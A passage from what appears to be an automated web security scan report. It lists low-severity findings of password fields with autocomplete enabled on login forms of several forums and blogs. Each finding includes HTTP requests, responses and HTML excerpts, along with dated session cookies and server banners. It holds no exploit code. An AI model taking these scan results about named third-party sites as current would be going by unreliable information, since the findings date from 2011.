<form action="./ucp.php?mode=login&amp;sid=19d91383ba404ea6abc69bff18558c0e" method="post">

<table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
<td>
               <input class="post" type="password" name="password" size="25" tabindex="2" />
               <br />
...[SNIP]...

15.44. http://forum.joomla.org/viewforum.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewforum.php

Issue detail

The page contains a form with the following action URL:
  • http://forum.joomla.org/ucp.php?mode=login&sid=37cbf4e15f54f7989d066007eee62641
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=37cbf4e15f54f7989d066007eee62641; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 124356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />

       <form method="post" action="./ucp.php?mode=login&amp;sid=37cbf4e15f54f7989d066007eee62641">

       <table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

15.45. http://forumas.lithuanianjoomla.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forumas.lithuanianjoomla.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://forumas.lithuanianjoomla.com/ucp.php?mode=login&sid=6bb0e598b965dee060e98ad373f62147
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache
Set-Cookie: phpbb3_9muwo_u=1; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_k=; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_sid=6bb0e598b965dee060e98ad373f62147; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="lt-lt" xml:lang="lt-lt">
<head>
...[SNIP]...
</div>
       <form method="post" action="./ucp.php?mode=login&amp;sid=6bb0e598b965dee060e98ad373f62147" class="headerspace">
       <h3>
...[SNIP]...
</label>&nbsp;<input type="password" name="password" id="password" size="10" class="inputbox" title="Slapta..odis" />
                           | <label for="autologin">
...[SNIP]...

15.46. http://forums.freebsd.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.freebsd.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://forums.freebsd.org/login.php?do=login
The form contains the following password field with autocomplete enabled:
  • vb_login_password

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:56 GMT
Server: Apache/2.2.17 (FreeBSD)
Set-Cookie: bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

15.47. http://help.tweetmeme.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.48. http://help.tweetmeme.com/2009/04/07/api-documentation/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.49. http://help.tweetmeme.com/2009/04/09/rss-feeds/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.50. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.51. http://help.tweetmeme.com/contact/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.52. http://help.tweetmeme.com/forum/forum/33

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum/forum/33

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /forum/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 6371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <meta http-equiv="Content-Type
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.53. http://help.tweetmeme.com/language/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The page contains a form with the following action URL:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

15.54. http://it.toolbox.com/blogs/database-soup

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/database-soup
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/database-soup" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.55. http://it.toolbox.com/blogs/database-talk

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/database-talk
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/database-talk" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.56. http://it.toolbox.com/blogs/db2luw

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/db2luw
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/db2luw" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.57. http://it.toolbox.com/blogs/db2zos

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/db2zos
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78332
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/db2zos" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.58. http://it.toolbox.com/blogs/elsua

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/elsua
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/elsua" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.59. http://it.toolbox.com/blogs/juice-analytics

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/juice-analytics
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61828
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/juice-analytics" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.60. http://it.toolbox.com/blogs/minimalit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/minimalit
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60086
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/minimalit" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.61. http://it.toolbox.com/blogs/penguinista-databasiensis

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/penguinista-databasiensis
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/penguinista-databasiensis" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.62. http://it.toolbox.com/blogs/ppmtoday

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The page contains a form with the following action URL:
  • http://it.toolbox.com/blogs/ppmtoday
The form contains the following password field with autocomplete enabled:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

15.63. http://joomlacode.org/gf/account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/account/

Issue detail

The page contains a form with the following action URL:
  • http://joomlacode.org/gf/account/?action=UserAddAction
The form contains the following password fields with autocomplete enabled:
  • password
  • password_confirm

Request

GET /gf/account/?action=UserAdd HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.3.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:36:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

